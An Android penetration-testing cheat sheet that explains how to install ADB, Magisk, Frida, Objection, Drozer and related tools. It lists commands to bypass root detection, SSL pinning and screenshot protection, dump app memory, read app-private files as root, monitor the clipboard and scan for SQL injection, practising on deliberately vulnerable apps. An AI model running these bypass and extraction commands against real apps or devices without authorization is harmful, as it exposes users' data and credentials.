• Download adb-setup.zip
• Extract the downloaded zip
• Double click on adb-setup-1.4.3.exe
• In CMD window select Y for all options
• Install the Google USB driver. (The installer will automatically run once the fastboot setup is complete)

6. Magisk (Link)

Pre-requirement:

• An android device with Bootloader unlocked
• USB Cable
• A pen-drive and OTG cable or SD card

Magisk installation for unlocked bootloader devices:

• Install custom recovery
  We need to install a custom recovery before installing magisk

  • Download a custom recovery for your Android device, such as TWRP / OrangeFox / PitchBlack onto your desktop.

  • Rename the downloaded recovery (.img) filename to "recovery.img" (without quote)

  • Enable usb debugging on your android device

  • Run this command to check your device is connected or not with proper access

    adb devices
    

    Allow usb debugging authorization prompt on android

    The output will look like this
    
    N.B: If you encounter an 'unauthorized' message after seeing your device number, follow the steps below. Ensure you perform these commands. Allow usb debugging authorization on your Android device when prompted also check Always allow from this computer checkbox. Select 'File Transfer' in USB mode.

    adb kill-server
    

    adb start-server
    

    adb devices
    

  • Run the command to initiate a reboot into fastboot mode

    adb reboot bootloader
    

  • Run command to check your device is properly connected in fastboot mode or not

    adb reboot bootloader
    

  • Flash the recovery image

    fastboot flash recovery recovery.img
    

  • Boot to Recovery from Fastboot via Commands

    fastboot boot recovery.img
    

• Install Magisk

  • Download Magisk version 24 or up apk in your desktop (Link)
  • Copy apk file into your pen-drive or SD card
  • Connect your pen-drive or insert SD card
  • Reboot your recovery once
  • Flash your Magisk.apk
  • Reboot your device
  • Open Magisk Manager from app menu
  • Follow on screen instruction to compleat the magisk setup

Mobile Security Framework (MobSF)

[!IMPORTANT] MobSF's Docker installation does not currently support dynamic analysis. If you only require static analysis, the Docker installation is straightforward. However, for dynamic analysis, it is recommended to install MobSF on a physical device.
In case of Windows installation MobSF requires some additional external dependencies. Please make your installation choice accordingly.

MobSF Installation on Docker

Pre-requirement:

• Docker (Link)

let's assume your docker engine up and running let's continue with MobSF installation

Install MobSF:

docker pull opensecurity/mobile-security-framework-mobsf

Run MobSF:

docker run -it --rm --name mobsf -p 8000:8000 opensecurity/mobile-security-framework-mobsf

MobSF Installation on Physical Machine

Pre-requirement:

• Python/Python3(Link)

let's assume you have installed Python/Python3 let's continue with MobSF installation on your desktop

Install MobSF (linux):

• Download latest release of MobSF from Mobile-Security-Framework-MobSF Github repository (Link)
• Extract the zip file and rename the extracted folder to MobSF and place the folder to your suitable location
• Open terminal inside the MobSF folder

# Give executable permission to setup.sh and run.sh file
chmod +x ./setup.sh && chmod +x ./run.sh
# run setup.sh
sudo ./setup.sh

Run MobSF (linux):

# run MobSF
./run.sh

Install MobSF (Windows):

• Download and install .NET Framework 4.6 (or Latest)(Link)
• Download Visual Studio Community Edition (Link)
  • Double click and run the Visual Studio installer
  • Select Visual C++ Build Tools
  • On right panel uncheck optionals (as it takes more space and its not required in this case)
  • Click on install at bottom right
• Download and install non-light version of OpenSSL (Link)
• Download and install wkhtmltopdf (Link)
• Download latest release of MobSF from Mobile-Security-Framework-MobSF Github repository (Link)
• Extract the zip file and rename the extracted folder to MobSF and place the folder to your suitable location
• Run powershell with Administrator privilege
• Navigate powershell to MobSF directory

# run setup.bat
setup.bat

Run MobSF (Windows):

# run MobSF
run.bat

Congratulation your MobSF is installed and running navigate to localhost:8000 using your preferred web browser.

Drozer (on desktop)

Pre-requirement:

• Docker (Link)

let's assume your docker engine up and running let's continue with Drozer installation on your desktop

Install Drozer:

docker pull fsecurelabs/drozer

Run Drozer:

docker run -it --rm --name drozer fsecurelabs/drozer

Congratulation your Drozer is installed on your desktop now we need to install Drozer Agent Apk agent-debug.apk

APKLeaks

Pre-requirement:

• Docker (Link)

let's assume your docker engine up and running let's continue with APKLeaks installation

Install APKLeaks:

docker pull dwisiswant0/apkleaks:latest

Run APKLeaks:

docker run -it --rm -v /tmp:/tmp dwisiswant0/apkleaks:latest -f /tmp/file.apk

Apktool

Pre-requirement:

• Java (Link)

let's assume you have installed Java JDK let's continue with Apktool installation on your desktop

Install Apktool (linux):

#  Clone apktool script
wget https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool -O apktool
# Give executable permission to apktool script
chmod +x apktool && cp apktool /usr/local/bin/apktool

• Check latest release of apktool from their Bitbucket repository (Link)

# Clone latest version of apktool
wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.1.jar -O apktool.jar
# Give executable permission to apktool and move to bin file
chmod +x apktool.jar && cp apktool.jar /usr/local/bin/apktool.jar

Install Apktool (Windows):

• Open the link on your browser right click and save the file as 'apktool.bat' (Link)
• Download latest version of apktool (Link)
• Move both apktool.jar and apktool.bat to your Windows directory. (Usually C://Windows)

Run Apktool:

apktool

APKToolGUI

Pre-requirement:

• Java (Link)

let's assume you have installed Java JDK let's continue with APKToolGUI installation on your desktop

Install APKToolGUI (Windows):

• Download latest release of APKToolGUI from APKToolGUI Github repository (Link)
• Extract the zip file and rename the extracted folder to APKToolGUI

Run APKToolGUI (Windows):

• Double click APKToolGUI.exe inside extracted APKToolGUI folder

N.B: Please note that APKToolGUI is currently only available for Windows OS.

JADX

Pre-requirement:

• Java (Link)

let's assume you have installed Java JDK let's continue with JADX installation on your desktop

Install JADX (linux):

• Download latest release of JADX from JADX Github repository (Link)
• Extract the zip file and rename the extracted folder to JADX

cd ./JADX/bin
# Give executable permission to jadx and jadx-gui script
chmod +x jadx && chmod +x jadx-gui

Run JADX (linux):

# run jadx cli
./jadx
# run jadx gui
./jadx-gui

Install JADX (Windows):

• Download latest release of JADX from JADX Github repository (Link)
• Extract the zip file and rename the extracted folder to JADX

Run JADX (Windows):

• Navigate to bin folder inside the JADX folder
• Double click jdax.bat to run jadx cli
• Double click jdax-gui.bat to run jadx gui

JD-GUI

Pre-requirement:

• Java (Link)

let's assume you have installed Java JDK let's continue with JD-GUI installation on your desktop

Install JD-GUI (linux):

• Download latest release of jd-gui-x.x.x.deb from java-decompiler/jd-gui Github repository (Link)

# Give executable permission to jd-gui-x.x.x.deb file
chmod +x ./jd-gui-x.x.x.deb
# Install jd-gui
sudo apt install ./jd-gui-x.x.x.deb

Run JD-GUI (linux):

# Run jd-gui
jd-gui

Install JD-GUI (Windows):

• Download latest release of jd-gui-windows-x.x.x.deb from java-decompiler/jd-gui Github repository (Link)
• Extract the zip file and rename the extracted folder to jd-gui

Run JD-GUI (Windows):

• Double click jd-gui.exe to run jd-gui

Dex2Jar

Pre-requirement:

• Java (Link)

let's assume you have installed Java JDK let's continue with Dex2Jar installation on your desktop

Install Dex2Jar (linux):

sudo apt install -y dex2jar

Install Dex2Jar (Windows):

• Download latest release of Dex2Jar from pxb1988/dex2jar Github repository (Link)
• Extract the zip file and rename the extracted folder to dex2jar

Objection

Pre-requirement:

• Python/Python3 (Link)

let's assume Python/Python3 is installed let's continue with objection installation on your desktop

Install Objection (Linux):

pip3 install objection

Install Objection (Windows):

pip install objection

Burp Suite

Pre-requirement:

• Java (Link)

let's assume you have installed Java JDK let's continue with Burp Suite installation on your desktop

• Go to the Burp Suite official website, pick either Burp Suite Professional or Burp Suite Community, and download the JAR file(Link)

Run Burp Suite:

java "--add-opens=java.desktop/javax.swing=ALL-UNNAMED" "--add-opens=java.base/java.lang=ALL-UNNAMED" "--add-opens=java.base/jdk.internal.org.objectweb.asm=ALL-UNNAMED" "--add-opens=java.base/jdk.internal.org.objectweb.asm.tree=ALL-UNNAMED" "--add-opens=java.base/jdk.internal.org.objectweb.asm.Opcodes=ALL-UNNAMED" "-noverify" "-jar" .\burpsuite.jar

Postman

• Go to the Postman official website, and download the tar.gz file for linux & the exe for the windows (Link)

Install Postman (Linux):

# Install dependencies
sudo apt-get -y install libgconf-2-4 openssl
# Extract the archive
tar zxf /path/to/downloaded/archive/Postman-linux-xXX-X.XX.X.tar.gz
# Move postman to apps
sudo mv Postman /opt/apps/
# Create shortcut
sudo ln -s /opt/apps/Postman/Postman /usr/local/bin/postman

Run Postman (Linux):

postman

Install & Run Postman (Windows):

• Double click downloaded installer

Radare2

Install Radare2 (Linux):

sudo apt-get -y install radare2

Install Radare2 (Windows):

• Download radare2-x.x.x-wxx.zip from official release (Link)
• Extract the zip in your preferred location

Run Radare2 (Linux):

radare2 -h

Run Radare2 (Windows):

.\radare2\bin\r2.bat

Nuclei

Pre-requirement:

• Docker (Link)

let's assume your docker engine up and running let's continue with Nuclei installation

Install Nuclei:

docker pull projectdiscovery/nuclei:latest

Run Nuclei:

nuclei -h

Zipalign

Install Zipalign (Linux):

sudo apt-get -y install zipalign

Run Zipalign (Linux):

zipalign

Install Zipalign (Windows):

• Download Android SDK Build-Tools latest release for window (Link)
• Extract the zip in your preferred location

Run Zipalign (Windows):

• Navigate to extracted zip file location

zipalign.exe

DB Browser for SQLite

Install DB Browser on Debian based linux distros:

sudo apt-get install sqlitebrowser

Install DB Browser on Ubuntu and Ubuntu based linux distros:

# Add PPA to repo list
sudo add-apt-repository -y ppa:linuxgndu/sqlitebrowser
# Update the repo list
sudo apt-get update
# Install sqlitebrowser
sudo apt-get install sqlitebrowser

Install DB Browser on Windows:

• Download windows installer (Link)
• Double click the Executable installer and install DB Browser

Run DB Browser (Linux):

sqlitebrowser

Frida Tools

Pre-requirement:

• Python/Python3 (Link)

let's assume Python/Python3 is installed let's continue with Frida Tools installation on your desktop

Install Frida Tools (Linux):

pip3 install frida
pip3 install frida-tools

Install Frida Tools (Windows):

pip install frida
pip install frida-tools

Frida Server (Magisk-Frida)

Pre-requirement:

• Magisk (Link)

let's assume Magisk is installed on your Android device let's continue with Frida Server installation

• Download MagiskFrida Latest version zip (Link)

• Place the zip on your Android

• Open your Magisk Manager App, go to module section, Click on 'Install from storage'

• Select the downloaded zip

• Reboot the device

  Refer to Picture

Always Trust User Certs & Burp-cert Magisk Modules

Pre-requirement:

• Magisk (Link)

let's assume Magisk is installed on your Android device let's continue with Always Trust User Certs & Burp-cert Magisk Modules installation

• Download Always Trust User Certs Magisk Module zip (Link)

• Download Burp-cert Magisk Module zip (Link)

• Place the zip on your Android

• Open your Magisk Manager App, go to module section, Click on 'Install from storage'

• Select the downloaded zip one by one

• Reboot the device

  Refer to Picture

Fridump

Pre-requirement:

• Python/Python3 (Link)
• Frida (Link)
• Frida Server (Link)

let's assume Python/Python3, Frida is installed on your desktop and Frida Server is installed on your android device let's continue with Fridump installation

Install Fridump (Linux):

git clone https://github.com/Nightbringer21/fridump.git

Run Fridump (Linux):

• Open terminal and navigate to fridump folder

python3 fridump.py -h

Install Fridump (Windows):

• Download the Fridump zip (Link)
• Rename the filename fridump-master.zip to fridump.zip
• Extract the fridump.zip

Run Fridump (Windows):

• Open powershell and navigate to fridump folder

python fridump.py -h

Useful Commands & Tools Usage

ADB Commands

Start the adb server:

adb start-server

Stop the adb server:

adb kill-server

List attached adb devices:

adb devices

Reboot the device using adb:

adb reboot

Backup device using adb:

# Basic backup of the device
adb backup -f <some_file_name>.ab

# Take backup of a specific app
adb backup -nosystem -noapk -noshared -f <some_file_name>.ab <package_name_of_the_apk>

# For a full device backup, including certain apps, system data, and files
adb backup -apk -obb -shared -all -system -f <some_file_name>.ab

# e.g.:
# adb backup -f testbackup.ab
# adb backup -nosystem -noapk -noshared -f diva_backup.ab jakhar.aseem.diva
# adb backup -apk -obb -shared -all -system -f testbackup_full.ab

# Other Options
# -f <filename> specify filename default: creates backup.ab in the current directory
# -apk|noapk enable/disable backup of .apks themself default: -noapk
# -obb|noobb enable/disable backup of additional files default: -noobb
# -shared|noshared backup device's shared storage / SD card contents default: -noshared
# -all backup all installed applications
# -system|nosystem include system applications default: -system
# <packages> a list of packages to be backed up (e.g. jakhar.aseem.diva) (not needed if -all is specified)

Restore device backup using adb:

adb restore <some_file_name>.ab

# e.g.:
# adb restore testbackup_full.ab

[!NOTE] Keep in mind that, restoring sensitive information or user logged-in sessions after restoring a backup taken via ADB could be considered a potential vulnerability.

Use adb over tcp:

# Use this command when you already connected to a device using USB
adb tcpip <desired_port_number>

# Disconnect the USB and run
adb connect <android_device_ip>:<desired_port_number>

# e.g.:
# adb tcpip 5555
# adb connect 192.168.50.23:5555

Entering android shell as user:

adb shell

Entering android shell as root:

adb shell su

List android packages:

# List all installed packages
adb shell pm list packages

# List only user installed packages:
adb shell pm list packages -3 | cut -f 2 -d ":"

# Other options:
# -f: see their associated file
# -d: filter to only show disabled packages
# -e: filter to only show enabled packages
# -s: filter to only show system packages
# -3: filter to only show third party packages
# -i: see the installer for the packages
# -U: also show the package UID

Find an android package:

# Lists packages containing the specified keyword
adb shell pm list packages 'keyword' | cut -d ':' -f2

# e.g.:
# adb shell pm list packages 'diva' | cut -d ':' -f2

Get Process ID (pid) of Apps:

# List all running apps pid:
adb shell ps

# List a particular app pid:
adb shell ps | <package_name_of_the_apk>

# e.g.:
# adb shell ps | jakhar.aseem.diva

Install an apk using adb:

adb install <name_of_apk_file>

# Install the apk to removable storage (-s)
adb install -s <name_of_apk_file>

# e.g.:
# adb install diva.apk
# adb install -s diva.apk

Launch an apk using adb:

# Method 1: Launch using Monkey tool
adb shell monkey -p <package_name_of_the_apk> -c 1

# Method 2: Launch using dumpsys tool
adb shell dumpsys package <package_name_of_the_apk>

# e.g.:
# adb shell monkey -p jakhar.aseem.diva -c 1
# adb shell dumpsys package jakhar.aseem.diva

N.B:
Monkey tool method means pretending to be a user and starting the app by clicking on its icon.
Monkey tool method will only worked when Main activity is exported in the AndroidManifest.xml.

Launch an apk activity directly using adb:

adb shell am start -n <package_name_of_the_apk>/.<activity_name>

# e.g.:
# adb shell am start -n jakhar.aseem.diva/.MainActivity

Uninstall an apk using adb:

adb uninstall <package_name_of_the_apk>

# Keep data and cache directories of the apk (-k)
adb uninstall -k <package_name_of_the_apk>

# e.g.:
# adb uninstall jakhar.aseem.diva
# adb uninstall -k jakhar.aseem.diva

Copy/Push a File/Directory to an Android device using ADB:

# Copy a file to android device
adb push <file_path_and_name> <location_on_device>

# Copy a directory to android device
adb push <directory_path_and_name> <location_on_device>

# e.g.:
# adb push Demo.txt /storage/emulated/0/
# adb push DemoFolder /storage/emulated/0/

Get/Pull a File/Directory from an Android device using ADB:

# Get a file from android device
adb pull <file_path_and_name> <location_on_computer>

# Get a directory to android device
adb pull <directory_path_and_name> <location_on_computer>

# e.g.:
# adb pull /storage/emulated/0/Demo.txt ./
# adb pull /storage/emulated/0/DemoFolder ./

Bypassing permission denied issue while Get/Pull a File from an Android device using ADB:

# Solution 1:
adb shell su -c 'cat <file_path_and_name>' > <location_on_computer>

# Solution 2: Useful when to check, SharedPreferences is accessible as non-root (low-privileged) user or not
adb exec-out run-as <package_name_of_the_apk> cat /data/user/0/<package_name_of_the_apk>/shared_prefs/<file_name> > <location_on_computer>

# Solution 3: Useful when you need to access a apps internal files or a file that owned by the particular app (root required)
adb shell su -c 'run-as <package_name_of_the_apk> cat <file_path_and_name>' > <location_on_computer>

# e.g.:
# adb shell su -c 'cat /data/user/0/jakhar.aseem.diva/files/Test.txt' > Test.txt
# adb exec-out run-as jakhar.aseem.diva cat /data/user/0/jakhar.aseem.diva/shared_prefs/settings.xml > settings.xml
# adb shell su -c 'run-as jakhar.aseem.diva cat /data/user/0/jakhar.aseem.diva/files/Test.txt' > Test.txt

[!TIP] run-as is a command that facilitates the execution of other commands with the permissions of a specific app on an Android device. This is essential for accessing app-specific data and resources that are normally restricted.

Syntax: adb shell run-as <package-name> <command> <args>
Example: adb shell run-as com.example.myapp cat /data/data/com.example.myapp/databases/mydatabase.db

Bypassing permission denied issue while Get/Pull a Directory from an Android device using ADB:

# Get a Directory from android device
dir="<directory_path_and_name>"; IFS=$'\n'; for subdir in $(adb shell su -c "find \"${dir}\" -type d"); do mkdir -p ".${subdir}"; done; for file in $(adb shell su -c "find \"${dir}\" -type f"); do adb shell su -c "cat \"${file// /\\\ }\"" > ".${file}"; done;

# e.g.:
# dir="somedir"; IFS=$'\n'; for subdir in $(adb shell su -c "find \"${dir}\" -type d"); do mkdir -p ".${subdir}"; done; for file in $(adb shell su -c "find \"${dir}\" -type f"); do adb shell su -c "cat \"${file// /\\\ }\"" > ".${file}"; done;

[!NOTE] Keep in mind that, when using ADB, empty directories will not be copied from or to an Android device.

Frida Commands

List android packages using Frida:

# List all packages with PID, Names & Identifiers
frida-ps -Uai

# List PID, Name, Identifiers that match the input string
frida-ps -Uai | grep -i '<part_of_the_package_name>'

# e.g.:
# frida-ps -Uai | grep -i 'diva'

[!TIP] -D : Use this flag Connect Frida to the specific device (the device identifier you gate by running adb devices command)

Syntax: frida-ps -D <device_identifier>
Example: frida-ps -Uai -D 27d1d6d3a03 | grep -i 'diva'

Discover an app internal methods/calls using frida:

# Discover internal methods/calls of an app and save the output in a file
frida-discover -U -f <package_name_of_the_apk> | tee <file_path_and_name>

# e.g.:
# frida-discover -U -f jakhar.aseem.diva | tee frida_discover.txt

N.B: Here tee command part is optional, I recommended this for display and also save the output in a file which may required letter.

Trace an app internal methods/calls using frida:

# Trace all internal methods/calls of an app
frida-trace -p <pid_of_an_app>

# Trace specific(s) internal methods/calls of an app
frida-trace -p <pid_of_an_app> -i '<function_name>*'

# e.g.:
# frida-trace -p 852
# frida-trace -p 852 -i 'log*'

[!TIP] You can use -i flag multiple times as per your needs.
For example: frida-trace -p 852 -i 'log*' -i 'recv*' -i 'send*'

For more frida-trace commands please read the official documentation.

Run Frida Scripts:

• Bypass root detection using Frida and dzonerzy/fridantiroot script

  frida --no-pause --codeshare dzonerzy/fridantiroot -f <package_name_of_the_apk>
  
  # e.g.:
  # frida --no-pause --codeshare dzonerzy/fridantiroot -f jakhar.aseem.diva
  

• Bypass SSL Pinning^[?] using Frida and pcipolloni/universal-android-ssl-pinning-bypass-with-frida script

  frida --no-pause --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida --no-pause -f <package_name_of_the_apk>
  
  # e.g.:
  # frida --no-pause --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida --no-pause -f jakhar.aseem.diva
  

• Bypass Emulator detection using Frida and m0bilesecurity/emulator_detection_bypass.js script

  • Download the emulator_detection_bypass.js script (Link)

    frida --no-pause -l emulator_detection_bypass.js -f <package_name_of_the_apk>
    
    # e.g.:
    # frida --no-pause -l emulator_detection_bypass.js -f jakhar.aseem.diva
    

• Combine two or more script in Frida

  frida --no-pause --codeshare dzonerzy/fridantiroot --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida --no-pause -l emulator_detection_bypass.js -f <package_name_of_the_apk>
  
  # e.g.:
  # frida --no-pause --codeshare dzonerzy/fridantiroot --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida --no-pause -l emulator_detection_bypass.js -f jakhar.aseem.diva
  

N.B: Frida automatically paused the target app when attaching. Using
--no-pause to prevent this, allowing the app to start normally while Frida injected the scripts.

For more Frida commands please read the official documentation.

For more Frida please visit Codeshare.

Objection Commands

Connect an app to Objection:

objection --gadget <package_name_of_the_apk> explore

# e.g.:
# objection --gadget jakhar.aseem.diva explore

Connect an app to Objection and load Frida script:

import <some_frida_script_file>
objection --gadget <package_name_of_the_apk> explore --startup-script <some_frida_script_file>

# e.g.:
# import emulator_detection_bypass.js
# objection --gadget jakhar.aseem.diva explore --startup-script emulator_detection_bypass.js

Re-attach to an app, if in case Objection detaches from the app:

# Get the pid by using `frida-ps -Uai` command
objection --gadget <pid_of_app> explore

# e.g.:
# objection --gadget 7814 explore

Extract useful information from an app using Objection:

# Some interesting information like passwords, paths could be find inside the environment.
env

Bypass SSL Pinning^[?] using Objection:

# Method 1: Run after connect an app to Objection
android sslpinning disable --quiet

# Method 2: Connect an app to Objection with SSL pinning disabled
objection --gadget <package_name_of_the_apk> explore --startup-command 'android sslpinning disable --quiet'

#e.g.:
# objection --gadget jakhar.aseem.diva explore --startup-command 'android sslpinning disable --quiet'

Bypass Root detection using Objection:

# Method 1: Run after connect an app to Objection
android root disable --quiet

# Method 2: Connect an app to Objection with Root detection disabled
objection --gadget <package_name_of_the_apk> explore --startup-command 'android root disable --quiet'

#e.g.:
# objection --gadget jakhar.aseem.diva explore --startup-command 'android root disable --quiet'

List KeyStore^[?] using Objection:

android keystore list

List Memory modules using Objection:

List activities, receivers and services using Objection:

# List activities
android hooking list activities <package_name_of_the_apk>

# List services
android hooking list services <package_name_of_the_apk>

# List receivers
android hooking list receivers <package_name_of_the_apk>

# e.g.:
# android hooking list activities jakhar.aseem.diva
# android hooking list services jakhar.aseem.diva
# android hooking list receivers jakhar.aseem.diva

Get current activity name using Objection:

android hooking get current_activity

# List all memory modules
memory list modules

# Grab particular module
memory list modules | grep '<app_name_or_part_of_app_name>'

# e.g.:
# memory list modules | grep 'diva'

Take Memory Dump^[?] using Objection:

# Dump all memory
memory dump all '<local_file_name_and_path>'

# Dump a part of memory
memory dump from_base <base_address> <size_to_dump> '<local_file_name_and_path>'

# e.g.:
# memory dump all 'all_memory.dmp'
#memory dump from_base 0x77bbc000 4096 'all_memory.dmp'

Search inside Memory using Objection:

memory search '<keyword_to_search>' --string

# e.g.:
# memory search 'api' --string

[!TIP] Base address can be obtain by running memory list modules command.

The size_to_dump is the amount of memory to extract, in bytes (e.g., 4096 for 4 KB).

Monitor user clipboard using Objection:

android clipboard monitor

List classes that were loaded inside the current application:

android hooking list classes

Search classes inside the current application:

android hooking search classes '<keyword_to_search>'

# e.g.:
# android hooking search classes 'jakhar.aseem.diva'

List declared Methods of a class with their parameters in the current application:

android hooking list class_methods <package_name_of_the_apk>.<activity_or_class_name>

# e.g.:
# android hooking list class_methods jakhar.aseem.diva.MainActivity

List methods inside classes:

methods inside the class <package_name_of_the_apk> <activity_or_class_name>

# e.g.:
# android hooking search classes jakhar.aseem.diva MainActivity

Hooking (watching) a method:

# Read source code in static analysis face to aware about function names
android hooking watch class_method <package_name_of_the_apk>.<activity_or_class_name>.<function_or_method_name> --dump-args --dump-backtrace --dump-return

# e.g.:
# android hooking watch class_method jakhar.aseem.diva.MainActivity.xyz --dump-args --dump-backtrace --dump-return

Hooking (watching) an entire class:

android hooking watch class <package_name_of_the_apk>.<activity_or_class_name> --dump-args --dump-return

# e.g.:
# android hooking watch class jakhar.aseem.diva.MainActivity --dump-args --dump-args --dump-return

Alter boolean return value of a function:

# From the source code you can determine which function returns a boolean, and make the function always return true or false:
android hooking set return_value <package_name_of_the_apk>.<activity_or_class_name>.<function_or_method_name> <bool>

# e.g.:
# android hooking set return_value jakhar.aseem.diva.MainActivity.xyz false

List instances of a specific Java class inside current app using Objection:

android heap print_instances <class_name>

# e.g.:
# android heap print_instances MainActivity

Screenshots protection bypass in current app using Objection:

# Enable screenshot with hardware key
android ui FLAG_SECURE false

Connect/execute/sync/disconnect SQLite command with current app database(s) using Objection:

# First identify current app database(s) location, then go to the location and connect to the database:
sqlite connect <sqlite_database_location_and_file_name>

# Check the status of the SQLite connection
sqlite status

# Get the database schema for the currently connected SQLite database
sqlite execute schema

# Execute sql query
sqlite execute query <sql query>

# Sync the locally cached SQLite database with remote database
sqlite sync

# Disconnect from the currently connected SQLite database file
sqlite disconnect

# e.g.:
# sqlite connect credentials.db
# sqlite execute query select * from data

[!NOTE] The sqlite command utility in Objection allows you to connect to a SQLite database. On connecting to a remote device database Objection copy the remote database file to a local temporary directory. When a user executes any SQL query, it is initially performed on the cached database file locally. If the user employs the sqlite sync command, the file is then validated. Once the local cached SQLite database is validated, it is synchronized with the remote database.

Drozer Commands

Connect to Drozer:

• Download Drozer Agent Apk agent-debug.apk

• Install the apk to device

  # Install drozer apk using ADB
  adb install agent-debug.apk
  

• Launch the drozer app

  adb shell monkey -p com.mwr.dz -c 1
  

• Starting the ADB Server

  adb forward tcp:31415 tcp:31415
  

• Connect to Drozer Desktop Server

  drozer console connect --server <desktop_ip>
  
  # e.g.:
  drozer console connect --server 192.168.100.5
  

Find an android package:

# Lists all packages using Drozer
run app.package.list

# Lists packages containing the specified keyword using Drozer
run app.package.list -f adb shell pm list packages 'keyword'

# e.g.:
# run app.package.list -f adb shell pm list packages 'diva'

List basic information about an android package:

run app.package.info -a <package_name_of_the_apk>

# e.g.:
# run app.package.info -a jakhar.aseem.diva

Show AndroidManifest.xml of an android package:

run app.package.manifest <package_name_of_the_apk>

# e.g.:
# run app.package.manifest jakhar.aseem.diva

Show Attack surface (common weakness) of an android package:

run app.package.attacksurface <package_name_of_the_apk>

# e.g.:
# run app.package.attacksurface jakhar.aseem.diva

Lists packages which the Backup flag is enabled:

run app.package.backup

Lists packages which the Debuggable flag is enabled:

run app.package.debuggable

List activities and intent filters of an android package using Drozer:

# List activities
run app.activity.info -a <package_name_of_the_apk>

# List intent filters
run app.activity.info -i <package_name_of_the_apk>

# List booth
run app.activity.info -i -a <package_name_of_the_apk>

# e.g.:
# run app.activity.info -a jakhar.aseem.diva
# run app.activity.info -i jakhar.aseem.diva
# run app.activity.info -i -a jakhar.aseem.diva

Launch an activity of an android package using Drozer:

# List activities
run app.activity.start --component <package_name_of_the_apk> <activity_name>

# e.g.:
# run app.activity.start --component jakhar.aseem.diva jakhar.aseem.diva.MainActivity

List exported and unexported content providers of an android package using Drozer:

# List exported content providers
run app.provider.info -a <package_name_of_the_apk>

# List unexported content providers
run app.provider.info -u -a <package_name_of_the_apk>

# e.g.:
# run app.provider.info -a jakhar.aseem.diva
# run app.provider.info -u -a jakhar.aseem.diva

Investigate Android package content providers for potential vulnerabilities using Drozer:

run scanner.provider.finduris <package_name_of_the_apk>

# e.g.:
# run scanner.provider.finduris jakhar.aseem.diva

Investigate Android package content providers for potential SQL Injections vulnerabilities using Drozer:

run scanner.provider.injection <package_name_of_the_apk>

# e.g.:
# run scanner.provider.injection jakhar.aseem.diva

Find tables accessible through SQL injection in a Android package using Drozer:

run scanner.provider.sqltables <package_name_of_the_apk>

# e.g.:
# run scanner.provider.sqltables jakhar.aseem.diva

Investigate Android package content providers for basic directory traversal vulnerabilities using Drozer:

run scanner.provider.traversal <package_name_of_the_apk>

# e.g.:
# run scanner.provider.traversal jakhar.aseem.diva

Investigate Android package for browsable activities that can be invoked from the web browser using Drozer:

run scanner.activity.browsable <package_name_of_the_apk>

# e.g.:
# run scanner.activity.browsable jakhar.aseem.diva

Investigate Android package native components for potential vulnerabilities using Drozer:

run scanner.misc.native <package_name_of_the_apk>

# e.g.:
# run scanner.misc.native jakhar.aseem.diva

Investigate Android package for secret codes that can be used from the dialer using Drozer:

run scanner.misc.secretcodes <package_name_of_the_apk>

# e.g.:
# run scanner.misc.secretcodes jakhar.aseem.diva

Terminology's

SSL Pinning

SSL (Secure socket layer) pinning in Android is a security measure where a mobile app validates a server's SSL certificate against a pre-defined certificate or public key embedded within the app. This helps prevent man-in-the-middle attacks by ensuring a secure and trusted connection.

KeyStore

In Android, a keystore is a secure storage system used to store and manage cryptographic keys and certificates. It provides a secure environment for tasks like SSL/TLS pinning, app authentication, and data encryption, enhancing the overall security of Android applications.

Memory Dump

In Android, a memory dump is a snapshot of the device's current system memory. It captures the contents of RAM, including running processes and their data. Check memory dump for any sensitive information stored in memory.

Important Links

• https://book.hacktricks.xyz/mobile-pentesting/android-checklist
• learnfrida.info
• codeshare.frida.re
• https://github.com/dweinstein/awesome-frida
• https://github.com/interference-security/frida-scripts
• https://github.com/m0bilesecurity/Frida-Mobile-Scripts
• https://github.com/WithSecureLabs/android-keystore-audit
• https://owasp.org/www-project-mobile-security-testing-guide/
• https://github.com/B3nac/Android-Reports-and-Resources
• https://github.com/wtsxDev/android-security-list
• https://mobile-security.gitbook.io/mobile-security-testing-guide/
• https://github.com/ashishb/android-security-awesome
• https://androidsdkoffline.blogspot.com/p/android-sdk-build-tools.html

Intentionally Vulnerable Applications For Practice

• Damn Insecure and vulnerable App for Android (DIVA) (Link)
• InsecureBankv2 (Link)
• VyAPI (Link) Hybrid (Cloud + Android)
• Damn Vulnerable Hybrid Mobile App (DVHMA) (Link)
• What a Terrible Failure (WaTF Bank) (Link)
• Vuldroid (Link)
• Oversecured Vulnerable Android App (OVAA) (Link) Raw Code(Gradle)

Important Tools

• Yaazhini
• Frida
• Objection
• Runtime Mobile Security (RMS)
• House
• APKTool
• JADx
• JD-GUI
• APKLeaks
• Fridump
• Drozer
• MobSF Mobile Security Framework

Vulnerable & Test Applications

• DIVA Android - DIVA (Damn Insecure and Vulnerable App) is designed to teach developers/QA/security professionals about common flaws due to insecure coding practices.
• InsecureBank v2 - A vulnerable Android application designed to teach various Android vulnerabilities.
• Uncrackable Mobile Apps - These apps are part of the OWASP Mobile Security Testing Guide and serve as practice for reverse engineering and mobile app security testing.
• VyAPI - A vulnerable Android app designed for learning purposes.
• DVHMA - Damn Vulnerable Hybrid Mobile App, intended for security enthusiasts to learn and practice hybrid mobile application security.
• WaTF Bank - Web and mobile application security practice tool.
• Injured Android - A vulnerable Android application for learning Android security.
• Sieve mwrlabs - A vulnerable app to learn about various Android security aspects.
• Vuldroid - A vulnerable Android app for security enthusiasts.
• Oversecured Vulnerable Android App - An app designed to teach mobile application security.

Guides & References

• Mobile App Pentest Cheat Sheet
• Mobile Apps Pentesting Checklist
• OWASP Mobile Security Testing Guide
• Android Reports and Resources
• Android Security List
• Mobile Security Testing Guide
• Awesome Android Security
• Android Security Awesome

I tried my best to enrich this checklist. Please feel free to share your key findings and knowledge. Thank you🙏

WEB APPLICATION PENTESTING CHECKLIST

OWASP Based Checklist 🌟🌟

500+ Test Cases 🚀🚀

Notion link: https://hariprasaanth.notion.site/WEB-APPLICATION-PENTESTING-CHECKLIST-0f02d8074b9d4af7b12b8da2d46ac998

• INFORMATION GATHERING

  Open Source Reconnaissance

  • Perform Google Dorks search
  • Perform OSINT

  Fingerprinting Web Server

  • Find the type of Web Server
  • Find the version details of the Web Server

  Looking For Metafiles

  • View the Robots.txt file
  • View the Sitemap.xml file
  • View the Humans.txt file
  • View the Security.txt file

